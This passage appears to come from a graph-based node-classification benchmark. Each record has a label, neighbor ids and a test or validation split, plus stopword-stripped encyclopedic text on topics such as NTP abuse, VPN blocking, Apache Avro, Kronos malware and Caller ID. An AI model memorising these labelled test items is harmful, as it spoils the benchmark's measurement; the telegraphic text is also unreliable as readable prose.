leaving disaster recovery plan bcp component interest like every insurance plan benefits obtained proper planning including according geoffrey h. wold disaster recovery journal entire process involved developing disaster recovery plan consists 10 steps initial testing plan done sections normal business hours minimize disruptions subsequent tests occur normal business hours types tests include checklist tests simulation tests parallel tests full interruption tests due high cost various plans without critics dell identified five common mistakes organizations often make related bcp/dr planning auditor determines adequacy company insurance coverage particularly property casualty insurance review company insurance policies research among items auditor needs verify scope policy including stated exclusions amount coverage sufficient cover organization ’ needs policy current force auditor also ascertains review ratings assigned independent rating agencies insurance company companies providing coverage financial viability cover losses event disaster effective dr plans take account extent company responsibilities entities ability fulfill commitments despite major disaster good dr audit include review existing moa contracts ensure organization legal liability lack performance event disaster unusual circumstance minimized agreements pertaining establishing support assisting recovery entity also outlined techniques used evaluating area include examination reasonableness plan determination whether plan takes factors account verification contracts agreements reasonableness documentation outside research auditor must verify planning ensures management recovery team effective communication hardware contact information internal communication external issues business partners key customers audit techniques include procedures sustain staff round-the clock disaster recovery effort included good disaster recovery plan procedures stocking food water capabilities administering cpr/first aid dealing family emergencies clearly written tested generally accomplished company good training programs clear definition job responsibilities review readiness capacity plan often includes tasks inquires personnel direct physical observation examination training records certifications auditor must review procedures take account possibility power failures situations non-it nature",
    "neighbors": [
      9184,
      6020,
      5636,
      3366,
      6280,
      3692,
      6514,
      10711,
      1400,
      7352
    ],
    "mask": "Test"
  },
  {
    "node_id": 11158,
    "label": 4,
    "text": "NTP_server_misuse_and_abuse:ntp server misuse abuse ntp server misuse abuse covers number practices cause damage degradation network time protocol ntp server ranging flooding traffic effectively ddos attack violating server access policy ntp rules engagement one incident branded ntp vandalism open letter poul-henning kamp router manufacturer d-link 2006 term later extended others retroactively include incidents however evidence problems deliberate vandalism usually caused shortsighted poorly chosen default configurations deliberate form ntp server abuse came note end 2013 ntp servers used part amplification denial-of-service attacks ntp servers would respond single monlist udp request packet packets describing 600 associations using request spoofed ip address attackers could direct amplified stream packets network resulted one largest distributed denial-of-service attacks known time troublesome problems involved ntp server addresses hardcoded firmware consumer networking devices major manufacturers oems produced hundreds thousands devices using ntp coupled customers almost never upgrading firmware devices ntp query storms problems persist long devices service one particularly common ntp software error generate query packets short less five second intervals response received might technically reasonable send initial packets short intervals essential health network client connection re-attempts generated logarithmically exponentially decreasing rates prevent denial service protocol exponential logarithmic backdown applies connectionless protocol extension many portions connection-based protocols examples backing method found tcp specification connection establishment zero-window probing keepalive transmissions october 2002 one earliest known cases time server misuse resulted problems web server trinity college dublin traffic ultimately traced misbehaving copies program called tardis thousands copies around world contacting web server obtaining timestamp via http ultimately solution modify web server configuration deliver customized version home page greatly reduced size return bogus time value caused clients choose different time server updated version tardis later released correct problem first widely known case ntp server problems began may 2003 netgear hardware products flooded university wisconsin–madison ntp server requests university personnel initially assumed malicious distributed denial service attack took actions block flood network border rather abating ddos attacks flow increased reaching 250,000 packets-per-second 150 megabits per second june subsequent investigation revealed four models netgear routers source problem found sntp simple ntp client routers two serious flaws first relies single ntp server university wisconsin–madison whose ip address hard-coded firmware second polls server one second intervals receives response total 707,147 products faulty client produced netgear released firmware updates affected products dg814 hr314 mr814 rp614 query netgear servers poll every ten minutes give five failures update fixes flaws original sntp client solve larger problem consumers never update router firmware particularly device seems operating properly university wisconsin–madison ntp server continues receive high levels traffic netgear routers occasional floods 100,000 packets-per-second netgear donated 375,000 university wisconsin–madison division information technology help identifying flaw also 2003 another case forced ntp servers australian commonwealth scientific industrial research organisation csiro national measurement laboratory close public traffic shown come bad ntp implementation smc router models ip address csiro server embedded firmware smc released firmware updates products 7004vbr 7004vwbr models known affected 2005 poul-henning kamp manager danish stratum 1 ntp server available general public observed huge rise traffic discovered 75 90 originating d-link router products stratum 1 ntp servers receive time signal accurate external source gps receiver radio clock calibrated atomic clock convention stratum 1 time servers used applications requiring extremely precise time measurements scientific applications stratum 2 servers large number clients home networking router meet either criteria addition kamp server access policy explicitly limited servers directly connected danish internet exchange dix direct use stratum 1 servers d-link routers resulted huge rise traffic increasing bandwidth costs server load many countries official timekeeping services provided government agency nist u.s. since danish equivalent kamp provides time service pro bono publico return dix agreed provide free connection time server assumption bandwidth involved would relatively low given limited number servers potential clients increased traffic caused d-link routers dix requested pay yearly connection fee approximately kamp contacted d-link november 2005 hoping get fix problem compensate time money spent tracking problem bandwidth charges caused d-link products company denied problem accused extortion offered amount compensation kamp asserted cover expenses 7 april 2006 kamp posted story website story picked slashdot reddit news sites going public kamp realized d-link routers directly querying stratum 1 time servers violating access policies least 43 process april 27 2006 d-link kamp announced amicably resolved dispute 20 years eth zurich provided open access time server swisstime.ethz.ch operational time synchronization due excessive bandwidth usage averaging upwards 20 gb day become necessary direct external usage public time server pools ch.pool.ntp.org misuse caused mostly it-providers synchronizing client infrastructures made unusually high demands network traffic thereby causing eth take effective measures availability swisstime.ethz.ch changed closed access access server blocked entirely ntp protocol december 2016 operator community ntppool.org noticed significant increase ntp traffic starting december 13 investigation showed snapchat application running ios prone querying ntp servers hardcoded third party ios ntp library request snapchat-owned domain followed ntp request flood snap inc. contacted developers resolved problem within 24 hours notification update application apology assist dealing load generated snap also contributed timeservers australia south america ntp pools positive side effect ntp library used open source error-prone default settings improved feedback ntp community firmware tp-link wi‑fi extenders 2016 2017 hardcoded five ntp servers including fukuoka university japan australia new zealand ntp server pools would repeatedly issue one ntp request five dns requests every five seconds consuming 0.72 gb per month per device excessive requests misused power internet connectivity check displayed device connectivity status web administration interface issue acknowledged tp-link branch japan pushed company redesign connectivity test issue firmware updates addressing issue affected devices affected devices unlikely install new firmware wifi extenders tp-link install firmware updates automatically notify owner firmware update availability tp-link firmware update availability also varies country even though issue affects wifi range extenders sold globally servers fukuoka university reported shutdown sometime february april 2018 removed ntp public time server lists incidents became clear apart stating server access policy technical means enforcing policy needed one mechanism provided extending semantics reference identifier field ntp packet stratum field 0 january 2006 rfc 4330 published updating details sntp protocol also provisionally clarifying extending related ntp protocol areas sections 8 11 rfc 4330 particular relevance topic kiss-o'-death packet good network citizen best practices security considerations section 8 introduces kiss-o'-death packets new requirements ntp protocol work retroactively old clients implementations earlier version protocol recognize kod act time good technical means counteract misuse ntp servers 2015 possible attacks network protocol time network time security ntp internet draft codice_1 proposed using transport layer security implementation june 21 2019 cloudflare started trial service around world based previous internet draft",
    "neighbors": [
      2947,
      8998,
      10344,
      2409,
      10924,
      9306,
      8956,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 11159,
    "label": 4,
    "text": "RiskIQ:riskiq riskiq cyber security company based san francisco california provides cloud-based software service saas organizations detect phishing fraud malware online security threats company co-founded 2009 lou manousos chris kiernan david pon received 10 million series funding summit partners february 2013 25 million series b funding battery ventures may 2014 riskiq member cloud security alliance csa isaca riskiq monitors advertising networks malware malvertising spyware also provides mobile app security services may 2018 standard bank deployed riskiq software automate threat analysis brand infringement cybercrime web-based attacks digital presence",
    "neighbors": [
      10717,
      4194,
      997,
      7304,
      467,
      10392,
      7515,
      8413
    ],
    "mask": "Test"
  },
  {
    "node_id": 11160,
    "label": 9,
    "text": "Link_time:link time computer science link time refers period time creation computer program linker applied program link time occurs compile time runtime program executed common speak link time operations operations performed linker link time requirements programming language requirements must met compiled source code successfully linked operations performed link time usually include fixing addresses externally referenced objects functions various kinds cross module checks e.g type checks externally visible identifiers languages instantiation templates optimizing compilers delay code generation link time information complete program available resolving external variables program also done link time definition programming language may specify link time requirements source code must meet successfully compiled e.g maximum number characters externally visible identifier must considered significant programming languages may necessary compilation linking occur runtime",
    "neighbors": [
      10145,
      1922,
      8262,
      6664,
      2386,
      2804,
      2620,
      10013
    ],
    "mask": "Test"
  },
  {
    "node_id": 11161,
    "label": 5,
    "text": "Apache_Avro:apache avro avro row-oriented remote procedure call data serialization framework developed within apache hadoop project uses json defining data types protocols serializes data compact binary format primary use apache hadoop provide serialization format persistent data wire format communication hadoop nodes client programs hadoop services avro uses schema structure data encoded two different types schema languages one human editing avro idl another machine-readable based json similar thrift protocol buffers require running code-generation program schema changes unless desired statically-typed languages apache spark sql access avro data source avro object container file consists file header consists data blocks avro specifies two serialization encodings binary json applications use binary encoding smaller faster debugging web-based applications json encoding may sometimes appropriate avro schemas defined using json schemas composed primitive types null boolean int long float double bytes string complex types record enum array map union fixed simple schema example data avro might stored corresponding schema meaning serialized item read without knowing schema ahead time serialization import avro.schema avro.datafile import datafilereader datafilewriter avro.io import datumreader datumwriter schema avro.schema.parse open user.avsc rb .read need know schema write according 1.8.2 apache avro writer datafilewriter open users.avro wb datumwriter schema writer.append name alyssa favorite_number 256 writer.append name ben favorite_number 7 favorite_color red writer.close file users.avro contain schema json compact binary representation data od -v -t x1z users.avro 0000000 4f 62 6a 01 04 14 61 76 72 6f 2e 63 6f 64 65 63 obj ... avro.codec 0000020 08 6e 75 6c 6c 16 61 76 72 6f 2e 73 63 68 65 6d .null.avro.schem 0000040 61 ba 03 7b 22 74 79 70 65 22 3a 20 22 72 65 63 a.. type rec 0000060 6f 72 64 22 2c 20 22 6e 61 6d 65 22 3a 20 22 55 ord name u 0000100 73 65 72 22 2c 20 22 6e 61 6d 65 73 70 61 63 65 ser namespace 0000120 22 3a 20 22 65 78 61 6d 70 6c 65 2e 61 76 72 6f example.avro 0000140 22 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 fields 0000160 74 79 70 65 22 3a 20 22 73 74 72 69 6e 67 22 2c type string 0000200 20 22 6e 61 6d 65 22 3a 20 22 6e 61 6d 65 22 7d name name 0000220 2c 20 7b 22 74 79 70 65 22 3a 20 5b 22 69 6e 74 type int 0000240 22 2c 20 22 6e 75 6c 6c 22 5d 2c 20 22 6e 61 6d null nam 0000260 65 22 3a 20 22 66 61 76 6f 72 69 74 65 5f 6e 75 e favorite_nu 0000300 6d 62 65 72 22 7d 2c 20 7b 22 74 79 70 65 22 3a mber type 0000320 20 5b 22 73 74 72 69 6e 67 22 2c 20 22 6e 75 6c string nul 0000340 6c 22 5d 2c 20 22 6e 61 6d 65 22 3a 20 22 66 61 l name fa 0000360 76 6f 72 69 74 65 5f 63 6f 6c 6f 72 22 7d 5d 7d vorite_color 0000400 00 05 f9 a3 80 98 47 54 62 bf 68 95 a2 ab 42 ef ... gtb.h ... b. 0000420 24 04 2c 0c 41 6c 79 73 73 61 00 80 04 02 06 42 ..alyssa ... b 0000440 65 6e 00 0e 00 06 72 65 64 05 f9 a3 80 98 47 54 en ... red ... gt 0000460 62 bf 68 95 a2 ab 42 ef 24 b.h ... b. 0000471 deserialization reader datafilereader open users.avro rb datumreader need know schema read user reader reader.close outputs though theoretically language could use avro following languages apis written addition supporting json type protocol definitions avro includes experimental support alternative interface description language idl syntax known avro idl previously known genavro format designed ease adoption users familiar traditional idls programming languages syntax similar c/c++ protocol buffers others apache avro logo defunct british aircraft manufacturer avro originally a.v roe company football team avro f.c uses logo",
    "neighbors": [
      9344,
      8582,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      1913,
      8217,
      1435,
      6555,
      8860,
      9245,
      6433,
      3876,
      3877,
      10661,
      11303,
      5677,
      1327,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      8644,
      11332,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      7889,
      1363,
      7767,
      8408,
      9179,
      7261,
      990,
      479,
      8799,
      865,
      9441,
      10465,
      10719,
      11235,
      8294,
      11111,
      8425,
      8554,
      747,
      8810,
      9454,
      2163,
      6774,
      7159,
      3705,
      1018,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11162,
    "label": 4,
    "text": "VPN_blocking:vpn blocking vpn blocking technique used block encrypted protocol tunneling communications methods used virtual private network vpn systems often used large organizations national governments corporations act tool computer security internet censorship preventing use vpns bypass network firewall systems blocking vpn access done different ways ports used common vpn tunneling protocols pptp l2tp establish connections transfer data closed system administrators prevent use certain networks similarly website prohibit access content blocking access ip addresses known belong vpn providers governments known block access overseas ip addresses since vpn use involve connecting remote hosts operate government jurisdiction organizations ramped efforts block vpn access bypasses firewalls vpn providers responded utilizing sophisticated techniques make connections less conspicuous instance chinese government began using deep packet inspection identify vpn protocols golden frog began scrambling openvpn packet metadata popular vyprvpn service attempt avoid detection chinese internet users started reporting unstable connections may 2011 using vpns connect overseas websites services apple app store universities businesses began issuing notices stop using tools circumvent firewall late 2012 companies providing vpn services claimed great firewall china became able learn discover block encrypted communications methods used number different vpn systems 2017 telecommunications carriers china instructed government block individuals use vpns february 2018 government iran began blocking access non-government sanctioned vpns march 2013 months prior 2013 elections prosecute users violating state laws take offenders national courts supervision judiciary service use vpns approved government reportedly led surveillance inspection private data july 2017 state duma passed bill requiring internet providers block websites offer vpns order prevent spreading extremist materials internet.. unclear exactly russia plans implement new regulation though seems like federal security service fsb isps tasked identifying cracking vpns russian internet users also reported block expressvpn vpn service november 2017 bbc made clear russia banned vpn usage entirely vpn usage banned attempting access sites already blocked roskomnadzor russia governing body telecommunications mass media communications using vpn business personal reasons access legal sites russia permitted government syria activated deep packet inspection uprising 2011 order block vpn connections censorship targeted different vpn protocols like openvpn l2tp pptp government egypt activated deep packet inspection egyptian revolution 2011 order block vpn connections block access objection media newspaper sites censorship targeted different vpn protocols like openvpn l2tp ikev2 pptp sites government turkey using deep packet inspection detecting possible openvpn connections attempt stop unauthorized access users outside us hulu began blocking users accessing site ip addresses linked vpn services april 2014 however company also restricted access legitimate u.s.-based users using vpns security reasons vpn providers vikingvpn nordvpn torguard stated would seek ways address issue customers speaking directly hulu resolution rolling dedicated ip addresses respectively netflix came pressure major film studios september 2014 block vpn access 200,000 australian subscribers using netflix despite available yet australia vpn access netflix like streaming services allowed users view content securely country netflix users also used vpns means bypassing throttling efforts made service providers verizon also important note vpns might slow internet connection trying stream netflix however cases using vpn might improve connection isp throttling netflix traffic june 2018 netflix vpn proxy ban still active ceo netflix reed hastings made comment 2016 vpn market whole “ ’ small quite vocal minority ’ really inconsequential us. ” bbc started blocking users connecting via vpns october 2015 bbc able detect vpn connections monitoring number simultaneous connections coming ip address number connections ip becomes abnormal bbc block future connections offending ip address iplayer remains unavailable uk tv licence holders connecting eu countries bbc said interested able allow uk licence fee payers access bbc iplayer holiday welcome european union regulation help make feasible wikipedia often blocks editing vpns many vpns use open proxies wikipedia allow open proxies however still view articles vpns use proxies use closed proxies usually still edit wikipedia",
    "neighbors": [
      10889,
      9868,
      9722,
      8211,
      3742,
      8998,
      4268,
      10417,
      7859,
      2228,
      8386,
      2884,
      5959,
      8265,
      11468,
      7376,
      11606,
      9048,
      2136,
      6490,
      5084,
      9318,
      8039,
      9063,
      11248,
      5749,
      3322,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11163,
    "label": 4,
    "text": "GTUBE:gtube gtube generic test unsolicited bulk email 68-byte test string used test anti-spam systems particular based spamassassin spamassassin carries antispam score 1000 default would sufficient trigger installation contents string follows placed message body rfc 5322 compliant email message without linebreaks whitespaces exist varieties notably naitube carry variable weight gtphish trigger specifically phishing mail used mcafee implementation spamassassin",
    "neighbors": [
      704,
      898,
      37,
      4294,
      7739,
      7515,
      2588
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11164,
    "label": 3,
    "text": "Data_portability:data portability data portability concept protect users data stored silos walled gardens incompatible one another i.e closed platforms thus subjecting vendor lock-in data portability requires common technical standards facilitate transfer one data controller another thus promoting interoperability data portability applies personal data involves access personal data without implying data ownership per se global level proponents seeing protection digital data human right thus emerging civil society draft declaration one finds mention following concepts statutes right privacy internet right digital data protection rights consumer protection internet united nations guidelines consumer protection regional level least three main jurisdictions data rights seen differently china/india united states european union latter personal data given special protection 2018 general data protection regulation gdpr gdpr thus became fifth 24 types legislation listed annex 1 table existing proposed european directives regulations relation data personal data basis behavioral advertising early 21st century value began grow exponentially least measured market capitalization major platforms holding personal data respective users european union regulators reacted perceived power imbalance platforms users although much still hinges terms consent given users platforms concept data portability comprises attempt correct perceived power imbalance introducing element competition allowing users choose among platforms right data portability laid european union general data protection regulation gdpr passed april 2016 regulation apply data processors whether inside outside eu process data individuals physically located within eu member state earlier european data protection supervisor stated data portability could let individuals benefit value created use personal data european-level article 29 data protection working party held consultation english lasting end january 2017 guidelines faq right data portability contain call action april 2017 new guidelines published article 29 working party website french national data supervisor cnil hosted discussion french current participants offer opinions legislation provides benefits companies many users although united kingdom voted withdraw eu intends incorporate much gdpr legislation include data portability ... gdpr contains noteworthy innovations – instance… introduction new right data portability likewise switzerland nation-state related eu bilateral basis efta member state trend moving direction swiss view officially published march 2018 document pdf cooperative proposed right data portability anchored constitution swiss confederation law passed includes data portability cooperative called midata.coop besides proposing legislation offer users place store data longer term swiss may consider data portability gdpr given gdpr raise compliance costs eu-based companies unlikely eu would tolerate situation third-party countries swiss companies would held standard order keep competition fair legal terms involved adequacy reciprocity always tricky legislators regulate right level precision everyone understands technology evolve faster law far european union formalized expectations around data portability requiring data structured commonly used machine-readable interoperable format touches least two distinct technical requirements effective interoperability list rights grown data portability right slightly different right access personal data see gdpr seventh item list cited immediately right access mandates data subject gets see personal data old eu data protection directive used require explicitly cases data provided intelligible form interpreted far human readable requirement still somewhat present eu general data protection regulation implicitly conjunction recital_ law since right portability mostly concerned reuse services i.e likely automated could human readable raw format would inappropriate effective data portability intermediate level might need sought addition gdpr limits scope data portability cases processing made basis either consent data subject performance contract data portability right related right explanation i.e automated decisions made legal effect significant impact individual data subjects display algorithm one way decision tree right however found useful empirical study right explanation related right evaluated basis automated processing shown last item list shown gabel hickman includes decisions based profiling right included eu data protection directive 1995 much enforcement followed article wired emphasised poignancy discussion issue discussed bygrave hildebrandt claimed one important transparency rights era machine learning big data contrary hildebrandt high expectations 2012 four years later many revisions gdpr text finalized three well-known authors contest whether right explanation still exists gdpr see united states description related developments seminal book law professor frank pasquale relevant passages reviewed electronic privacy information center epic even u.s. defense advanced research projects agency darpa explainable ai xai program cited critically blogger artur kiulian several papers published topics 2016 first goodman flaxman outlines development right explanation pasquale think approach goes far enough stated blog entry london school economics lse fact lse whole series algorithmic accountability one entry feb. 2016 notable ones joshua kroll mireille hildebrandt another 2016 paper one published katarinou et al. includes remarks right appeal individuals would right appeal machine decision made human third 2016 paper one co-authored mittelstadt et al. maps literature relates gdpr pages 13–14 fourth paper one co-authored wachter mittelstadt floridi refutes idea right might included gdpr proposes limited ‘ right informed ’ instead calls creation agency implement transparency requirement paper edwards veale claims right unlikely apply cases 'algorithmic harms attracting recent media attention insufficient attention paid computer science literature explanation gdpr provisions data protection impact assessments data portability might help almost two years later paper appeared challenges earlier papers especially wachter mittelstadt floridi sides atlantic recent activity pertaining ongoing debate early 2016 experts artificial intelligence uk government officials met number meetings developed data science ethical framework november 7 2016 event held brussels organized mep marietje schaake european parliament described danah boyd eleven days later new york university conference fairness accountability transparency machine learning principles accountable algorithms social impact statement algorithms articulated placed online discussion mid-december ieee came document whose editing backed public comments invited march 2017 ethically aligned design later 2017 data portability analysed professors data protection central innovation new gdpr",
    "neighbors": [
      2948,
      9901,
      9967,
      7897,
      7359
    ],
    "mask": "None"
  },
  {
    "node_id": 11165,
    "label": 4,
    "text": "Warchalking:warchalking warchalking drawing symbols public places advertise open wi-fi network inspired hobo symbols warchalking marks conceived group friends june 2002 publicised matt jones designed set icons produced downloadable document containing within days jones publishing blog entry warchalking articles appeared dozens publications stories appeared several major television news programs around world word formed analogy wardriving practice driving around area car detect open wi-fi nodes term turn based wardialing practice dialing many phone numbers hoping find modem found wi-fi node warchalker draws special symbol nearby object wall pavement lamp post offering wi-fi service might also draw symbol advertise availability wi-fi location whether commercial personal",
    "neighbors": [
      1121,
      10021,
      7222,
      6712,
      61
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11166,
    "label": 4,
    "text": "Norman_Safeground:norman safeground norman safeground develops sells data security software anti-virus anti-spam anti-spyware backup local support company headquarters oslo norway norman safeground global partner-network main market europe norman competes antivirus industry avira bullguard f-secure frisk kaspersky mcafee panda security sophos symantec trend micro among others norman founded 1 october 1984 oslo company pioneer proactive security software solutions forensics malware tools utilizing patented sandbox technology 1995 norman acquired 50 percent ibas norwegian data recovery company company listed oslo stock exchange 11 august 1997 norman asa bought remaining 50 percent stake ibas 1999 2004 two companies de-merged ibas listed separate entity oslo stock exchange norman de-listed oslo stock exchange october 2009 acquired private equity fund fsn capital partners late 2012 norman asa split two companies br norman safeground focusing consumers smes norman shark focusing enterprise market intrusion prevention solutions services november 2014 norman safeground acquired avg technologies",
    "neighbors": [
      3201,
      156,
      11166,
      2213,
      3366,
      2601,
      704,
      9537,
      7362,
      202,
      1994,
      2005,
      1242,
      7515,
      9055,
      9569,
      4972,
      4464,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 11167,
    "label": 4,
    "text": "SuEXEC:suexec apache suexec feature apache web server allows users run common gateway interface cgi server side includes ssi applications different user normally web server processes run default web server user often wwwrun www-data apache nobody suexec feature consists module web server binary executable acts wrapper suexec introduced apache 1.2 often included default apache package provided linux distributions client requests cgi suexec activated call suexec binary wraps cgi scripts executes user account server process virtual host defined virtual host directive additionally suexec perform multi-step check executed cgi ensure security server including path-checks limit permitted commands etc user alice website including common gateway interface script files codice_1 common web root directory name folder accessed codice_2 user bob views alice webpage requires apache run one cgi scripts instead running scripts wwwrun results need scripts readable executable wwwrun group file owned group users otherwise scripts codice_3 wrapped using suexec run alice user id resulting higher security eliminating need make scripts readable executable users everyone wwwrun group instead alice needs able run script",
    "neighbors": [
      225,
      11154,
      2485,
      865
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11168,
    "label": 4,
    "text": "Kronos_(malware):kronos malware kronos type banking malware first reported 2014 sold 7,000 similar zeus focused stealing banking login credentials browser sessions 2015 attacks focused british banks august 2017 british security researcher marcus hutchins aka 'malwaretech previously notable involvement stopping may 2017 wannacry ransomware attack arrested fbi whilst visiting united states alleged created software 2014 sold 2015 via alphabay forums",
    "neighbors": [
      10297,
      7515,
      9375
    ],
    "mask": "Test"
  },
  {
    "node_id": 11169,
    "label": 3,
    "text": "ES_PEVM:es pevm es pevm ес пэвм soviet clone ibm pc 1980s es pevm models lineup also included analogues ibm pc xt ibm pc ibm xt/370 computers software adapted minsk belarus scientific research institute electronic computer machines нии эвм manufactured minsk well minsk production group computing machinery минское производственное объединение вычислительной техники мпо вт first models es pevm es-1840 es-1841 es-1842 unlike ibm pc two units system unit floppy drives unit models used backplane instead main board although system bus compatible isa bus used different type connector ibm pc expansion cards could installed es pevm later models es-1843 es-1849 etc fully compatible ibm pc xt ibm pc unlike ibm pc using intel 8088 processor early es pevm models used k1810vm86 processor 16-bit bus clock frequency 5 mhz processor placed separate board early versions board socket floating point coprocessor following boards produced es-1840 es-1841 volume production number models computers shipped alphados entirely russified version ms-dos/pc-dos 2.x 3.x commands entered russian example сменкат chdir files file extensions also russian атриб.исп attrib.exe operating system used main code page hardwired display rom compatible neither cp 866 cp 855 although partially iso/iec 8859-5 early models es pevm prone failures due manufacturing defects mean time failures mtbf around 350 hours",
    "neighbors": [
      9861,
      1515,
      6415,
      5368,
      3098
    ],
    "mask": "Test"
  },
  {
    "node_id": 11170,
    "label": 4,
    "text": "Caller_ID:caller id caller id caller identification cid also called calling line identification clid calling line identification cli calling number delivery cnd calling number identification cnid calling line identification presentation clip call display telephone service available analog digital telephone systems including voip transmits caller telephone number called party telephone equipment call set caller id service may include transmission name associated calling telephone number service called cnam service first defined 1993 international telecommunication union telecommunication standardization sector itu-t recommendation q.731.3 recipient may inspect information answering call display telephone set separately attached device digital displays cable television sets telephone television service provided vendor caller id information may inaccurate false forged hence caller id information fully relied upon identify caller.. root cause lack authenticity accountability transmission telephone identities countries terms caller display calling line identification presentation clip call capture calling line identity used call display predominant marketing name used canada although customers still refer colloquially caller id idea cnid service pots subscribers originated automatic number identification ani part toll free number service united states however cnid ani thing ani originally term given system identified telephone number placing call non-electronic central office switch previous calling number could identified electronically caller id made two separate pieces information calling number billing subscriber name available call made given name name passed number different methods example caller name may datafilled originating switch case sent along number commonly database accessed receiving switch order match number name name exist city state province designation may sent databases may shared among several companies paying every time name extracted reason mobile phone callers appear wireless caller location phone number registered e.g cell phone ga cell phone registered georgia u.s.a. vary based company owns block numbers provider number may ported additionally nothing ensures number sent switch actual number call originated telephone switch initiating call may send digit string desired caller id telephone switch therefore operating entity must also trusted provide secure authentication displayed caller id also depends equipment originating call call originates pots line standard loop start line caller id provided service provider local switch since network connect caller callee phone answered generally caller id signal altered caller service providers however allow caller block caller id presentation vertical service code *67 call placed behind private branch exchange pbx options typical telephony environment pbx connects local service provider primary rate interface pri trunks generally although absolutely service provider simply passes whatever calling line id appears pri access trunks transparently across public switched telephone network pstn opens opportunity pbx administrator program whatever number choose external phone number fields ip phone services itsps internet telephony service providers support pstn gateway installations throughout world gateways egress calls local calling area thus avoiding long distance toll charges itsps also allow local user number located foreign exchange new york caller could los angeles number example user places call calling line id would los angeles number although actually located new york allows call return without incur long distance calling charges cellphones biggest issue appears passing calling line id information network cellphone companies must support interconnecting trunks significant number wireline pstn access carriers cli localisation describes process presenting localised cli calling line identity recipient telephone call cli localisation utilised various organisations including call centres debt collectors insurance companies cli localisation allows companies increase contact rate increasing chance called party answer phone call localised cli displayed called party device call perceived local recognisable caller rather withheld unknown premium rate number presented telephone number adjusted depending area code dialed number 1968 theodore george ted paraskevakos working communications engineer sita athens greece began developing system automatically identify telephone caller call recipient several attempts experiments developed method caller number transmitted receiver device method basis modern-day caller id technology 1969 1975 paraskevakos issued twenty separate patents related automatic telephone line identification since significantly predated similar patents appear prior art later united states patents issued kazuo hashimoto carolyn a. doughty 1971 paraskevakos working boeing huntsville alabama constructed reduced practice transmitter receiver representing world first prototypes caller-identification devices installed peoples telephone company leesburg alabama demonstrated several telephone companies original historic working models still possession paraskevakos patents related devices paraskevakos also proposed send alphanumeric information caller name receiving apparatus make banking telephone feasible also proposed identify calling telephone special code e.g. pf public phone ho home phone office phone pl police may 1976 kazuo hashimoto prolific japanese inventor one thousand patents worldwide first built prototype caller id display device could receive caller id information work caller id devices early prototypes received smithsonian institution national museum american history 2000 u.s. patent 4,242,539 filed originally may 8 1976 resulting patent re-examined patent office successfully licensed major telecommunications computer companies world initially operating telephone companies wanted caller id function performed central office voice announcement charged per-call basis john harris employee northern telecom telephone set manufacturing division london ontario promoted idea caller id telephone set display telephone coded eccs enhanced custom calling services video prototype used leverage feature central office telephone set 1977 brazilian inventor valdir bravo salinas filed patent application caller id device brazilian patent trademarks office inpi patent issued 1982 patent pi7704466 first patent ever issued caller id equipment brazil later 1980 two brazilian inventors joão da cunha doya nélio josé nicolai filed different patent applications caller id devices doya ’ application filed may 2 1980 issued patent pi8003077 nicolai ’ application filed july 2 1980 rejected copy salinas invention 1981 another application caller id equipment filed inpi josé daniel martin catoira afonso feijó da costa ribeiro neto application granted patent issued patent pi8106464 first market trial caller id custom local area signaling services conducted bell atlantic may 1984 bell communications research bellcore named service caller id regional bell operating companies later adopted name eventually became generally accepted name united states planning trial initiated team bell laboratories western electric bell system divestiture participation bell atlantic purpose trials assess revenue potential services depend deployment common channel signaling network needed transmit calling number originating terminating central offices trial results analyzed bellcore members original team 1987 bell atlantic verizon communications conducted another market trial hudson county new jersey followed limited deployment bellsouth first company deploy caller id december 1988 memphis tennessee full deployment nine-state region next four years bell atlantic second local telephone company deploy caller id new jersey hudson county followed us west communications centurylink 1989 1995 bellcore released another type modulation similar bell 202 became possible transmit caller id information even provide call-disposition options user already telephone service became known markets call waiting id combined call-disposition options call waiting deluxe technically referred analog display services interface call waiting deluxe bellcore telcordia technologies term type ii caller id disposition options class-based pots-telephone calling feature works combining services call waiting caller id also introduces options feature conjunction certain screen-based telephones capable equipment gives telephone user option data checksum united states caller id information sent called party telephone switch analog data stream similar data passed two modems using bell 202 modulation first second rings telephone unit still hook telephone call answered quickly first ring caller id information transmitted recipient two types caller id number name+number number-only caller id called single data message format sdmf provides caller telephone number date time call name+number caller id called multiple data message format mdmf addition information provided sdmf format also provide directory listed name particular number caller id readers compatible mdmf also read simpler sdmf format sdmf caller id reader recognize mdmf data stream act caller id information present e.g line equipped caller id instead sending caller id first second ring systems uk use line reversal announce caller id caller id signals simply sent without announcement instead bell 202 european alternative v.23 sometimes used without 75-baud reverse channel data sent using dtmf signalling general cid transmitted origin call calling party full phone number including area code including international access code country code international call calling party name added consumer terminating central office consumer subscribed service calling name delivery automatic ss7 signalling system 7 tcap query may launched called party central office order retrieve information calling name delivery caller id equipment consumer location caller name already associated calling party line originating central office canadian systems using ccs7 automatically cases send calling name call set-up routing information time call look name associated phone number carrier instances access information third-party database database providers charge small fee access databases cnam dip fee small – less penny per call starts negotiations cnam dip fees .004 per lookup opencnam fees bit expensive .0048 per lookup avoid charges carriers report name unavailable report name city state based phone number particularly wireless callers toll-free numbers may report string tollfree number name available database smartphones use third-party mobile app name lookup third-party database telemarketing organisations often spoof caller id instances done provide central number consumers call back toll-free number rather consumers call back outbound call centre call actually originated however telemarketers block fraudulently spoof caller id prevent traced united states federal law telemarketers block send false caller id individuals bring civil suits federal communications commission fcc fine companies individuals illegally spoofing blocking caller id telemarketers used caller id marketing using toll-free number registering text string free money free plane tickets name displayed caller id internet service providers isps providing dial-up access require customer use cnid prevent abuse account unauthorised callers systems dial-up access programmed accept calls specific caller id strings mobile phone providers used caller id automatically connect voice mail call voice mail number made associated mobile phone number bypassing need enter password convenient many users spoofing practice replaced secure authentication many carriers caller id transmission implemented using different technologies standards countries united states bellcore fsk standard prevalent whereas taiwan uses etsi fsk sometimes individual service providers within country use different standards caller id converters used translate one standard another telephone equipment usually displays clid information difficulty modems notoriously problematic modems support british telecom standard hardware drivers often errors prevent clid information recognised uk telephone companies use slight variations bellcore standard clid support hit miss cnd currently available australia 